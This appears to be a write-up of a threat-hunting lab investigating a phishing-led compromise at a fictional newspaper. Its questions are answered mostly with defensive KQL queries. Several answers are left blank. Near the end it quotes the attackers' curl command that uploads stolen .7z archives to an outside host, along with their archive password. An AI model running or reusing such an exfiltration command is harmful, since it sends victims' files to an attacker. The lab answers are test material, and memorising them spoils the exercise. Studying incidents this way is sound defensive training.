A Scandal

  1. How many total emails were sent by this email sender to users at The Valdorian Times?

Ans: 18

```kql
// KQL
Email
| where sender == "[email protected]"
| summarize count()
```
  1. When did [email protected] send an email to Ronnie McLovin?

Ans

  1. What domain was in the link from that email?

Ans: Just update the previous KQL query to project the link column as well.

  1. What was the subject of that email?

Ans: ✅ [EXTERNAL] Breaking News: We're Hiring! Apply Now for Reporter Roles

  1. When did Ronnie click on the link in the email from [email protected] ?

Ans: For this we need to look at OutboundNetworkEvents where the source IP is Ronnie's IP, since clicking the link generates outbound network traffic to the linked domain.
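One way to find the click, as an added example query that is not part of the original write-up; it assumes the KC7-style column names `name` and `ip_addr` (Employees), `subject` and `link` (Email), and `timestamp`, `src_ip`, `method` and `url` (OutboundNetworkEvents):

```kql
// Added example query; column names are assumptions about the lab schema.
// 1. Resolve Ronnie's IP address from the Employees table.
let ronnie_ip = toscalar(
    Employees
    | where name has "McLovin"
    | project ip_addr
    | take 1);
// 2. Pull the host of the phishing link out of the known email subject,
//    so the same query keeps working if the link path changes.
let phish_host = toscalar(
    Email
    | where subject == "[EXTERNAL] Breaking News: We're Hiring! Apply Now for Reporter Roles"
    | extend host = tostring(parse_url(link).Host)
    | distinct host
    | take 1);
// 3. The click shows up as outbound traffic from Ronnie's IP to that host;
//    the earliest hit is the moment she clicked.
OutboundNetworkEvents
| where src_ip == ronnie_ip
| where url has phish_host
| project timestamp, src_ip, method, url
| sort by timestamp asc
```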

  1. What was the name of the .docx file that was downloaded to Ronnie's machine?

Ans: First find the name (hostname) of Ronnie's machine.

Then write a KQL query against that hostname to find the .docx file.

  1. When was this docx file downloaded?

Ans: Just add timestamp to the projected columns of the previous query.

  1. When was the .ps1 file dropped to Ronnie's machine?

Ans

  1. What IP address was used with plink on Ronnie's machine?

Ans

  1. What username was used with plink on Ronnie's machine?

Ans: In the previous command, the username is the value that follows ssh -l:

$had0w

  1. What password was used with plink on Ronnie's machine?

Ans: Also found in the same command from the previous answer.

  1. How many discovery commands were run on Ronnie's machine?

Ans: 5

  1. Your investigative buddy, who was also looking at Ronnie's machine, saw a weird file fakestory.docx being downloaded from a suspicious domain.

    Let's see if we can find evidence of this download in OutboundNetworkEvents.

    What is Ronnie's IP address?

Ans: The question is just long-winded; a simple query against the Employees table returns Ronnie's details, including her IP address.

  1. What is the full URL fakestory.docx was downloaded from?

Ans: We already have Ronnie's IP address from the previous query, so we can query OutboundNetworkEvents by that source IP to find the URL.

  1. It does look like someone downloaded fakestory.docx to Ronnie's machine. Let's see if we can find that file on disk.

    What is Ronnie's hostname?

Ans: A37A-DESKTOP (the hostname was already returned by the previous Employees query).

  1. What is the sha256 hash of fakestory.docx on Ronnie's machine?

Ans:

  1. When was fakestory.docx created on Ronnie's machine?

Ans: The timestamp is in the output of the previous query.

✅ 2024-01-31T09:47:51Z

  1. Ronnie doesn't recall ever seeing that file or visiting that domain. It seems that this file download is evidence of hands-on-keyboard activity from the attackers.

    Let's see what the attackers did after they downloaded fakestory.docx by looking at ProcessEvents for Ronnie's machine.

    After downloading fakestory.docx, the attackers ran a command to rename and move the file to a different location.

    What is the new path for the document?

Ans: ✅ C:\Users\romclovin\Documents\OpEdFinal_to_print.docx

  1. When was this command executed to rename and move the file?

Ans: 2024-01-31T10:26:20Z

  1. OpEdFinal… that seems familiar.

    Wait a minute, that's the same file name you saw when you looked in the email logs to find Ronnie sending the draft to Clark Kent. Is it possible that the attacker used Ronnie's email to send this file to Clark?

    When was OpEdFinal_to_print.docx emailed from Ronnie's account to Clark Kent?

Ans: ✅ 2024-01-31T11:11:12Z

  1. How many minutes elapsed between when the file was moved/renamed on Ronnie's machine and when the email was sent to Clark Kent?

Ans: This needs a slightly more involved KQL query, built in two steps:

  1. Find the timestamp when the file was moved/renamed:

kql

  1. Find the timestamp when the email was sent:

kql
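The two steps combined into one query, as an added example that is not part of the original write-up; it assumes the KC7-style column names `hostname`, `process_commandline` and `timestamp` (ProcessEvents) and `sender`, `subject` and `timestamp` (Email), and uses the hostname, file name and subject line already established above:

```kql
// Added example query; column names are assumptions about the lab schema.
// Step 1: timestamp of the rename/move that produced OpEdFinal_to_print.docx.
let moved_at = toscalar(
    ProcessEvents
    | where hostname == "A37A-DESKTOP"
    | where process_commandline has "OpEdFinal_to_print.docx"
    | where process_commandline has_any ("move", "ren", "rename", "Move-Item", "Rename-Item")
    | summarize min(timestamp));
// Step 2: timestamp of the email sent from Ronnie's account with that subject.
let sent_at = toscalar(
    Email
    | where sender has "romclovin"
    | where subject has "Final OpEd Draft Edits"
    | summarize min(timestamp));
// Step 3: compute the gap. datetime_diff counts minute boundaries crossed,
// so the exact fractional difference is shown too to avoid off-by-one surprises.
print moved_at, sent_at,
      minutes_whole = datetime_diff('minute', sent_at, moved_at),
      minutes_exact = (sent_at - moved_at) / 1m
```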

  1. What was the subject line of this email?

Ans: From the previous query.

✅ URGENT: Final OpEd Draft Edits (Please publish the following article in tomorrow's paper))

  1. Wow! So it looks like the attackers downloaded the fake story, renamed it OpEdFinal_to_print.docx, and then sent the file to Clark Kent using Ronnie's email!

    Do you think this is the only thing the attackers did on Ronnie's machine? (yes/n

Ans: No

  1. In the middle of your investigation, Ronnie finds you and shows you an alert she received from her dark web monitoring service. What is the domain mentioned in this alert?

Ans: ✅ hirerecruit.com

  1. Oh no! It looks like someone may have stolen Ronnie's memes from her machine! Let's see if we can find evidence of the attackers stealing any data.

    We can timebound our analysis to find other actions that occurred around the same time by using this query:

Ans: 2

  1. Right after renaming fakestory.docx to OpEdFinal_to_print.docx, the attackers ran commands to steal (exfiltrate) data from Ronnie's machine.

    One command the attackers ran leveraged 7zip to compress all of Ronnie's dank memes into a .7z file. What is the name of the .7z file that contains the stolen memes?

Ans: DankMemes.7z

  1. What is the name of the .7z file that contains files stolen from Ronnie's Documents folder?

Ans: Look for the MyStolenData file name.

✅ MyStolenDataFromDocuments.7z

  1. What is the name of the .7z file that contains files stolen from Ronnie's Desktop folder?

Ans: ✅ MyStolenDataFromDesktop.7z

  1. What is the password the attackers used to encrypt all of the .7z files?

Ans: ✅ thruthW!llS3tUfree

  1. After compressing all the stolen data into .7z files, the attackers exfiltrated the data by uploading it to a custom portal on their website.

    What is the full command the attackers ran to do this?

Ans: ✅ curl -F "file=@C:\Users\romclovin\Documents*.7z" https://hirejob.com/exfil_processor/upload.php

  1. What domain was the stolen data uploaded to?

Ans: ✅ hirejob.com

  1. Query ProcessEvents for all devices at Valdorian Times.

    Was data stolen from any other devices and uploaded to hirejob.com? (yes/no)

Ans: No, since no host other than "A37A-DESKTOP" shows this activity.
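A fleet-wide hunt for the same staging-and-upload pattern, as an added example that is not part of the original write-up; it assumes the KC7-style column names `hostname`, `username`, `process_commandline` and `timestamp` in ProcessEvents and correlates the 7-Zip archiving with a later curl upload on the same device:

```kql
// Added example hunt; column names are assumptions about the lab schema.
// Stage 1: archives created with 7-Zip on any host.
let archives = ProcessEvents
    | where process_commandline has "7z"
    | project hostname, username, archive_time = timestamp, archive_cmd = process_commandline;
// Stage 2: curl multipart uploads (-F "file=@...") of .7z files or to the exfil domain.
let uploads = ProcessEvents
    | where process_commandline has "curl" and process_commandline contains_cs "-F"
    | where process_commandline has_any ("7z", "hirejob.com")
    | project hostname, upload_time = timestamp, upload_cmd = process_commandline;
// Correlate per host: an upload within 24h after an archive on the same device.
archives
| join kind=inner uploads on hostname
| where upload_time between (archive_time .. (archive_time + 1d))
| summarize archive_cmds = make_set(archive_cmd), upload_cmds = make_set(upload_cmd),
            first_archive = min(archive_time), last_upload = max(upload_time)
    by hostname, username
| sort by first_archive asc
// Every hostname in the result shows the staging + exfil pattern; the question
// is answered by whether any row other than A37A-DESKTOP appears.
```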

From the next question onwards the answers are straightforward.
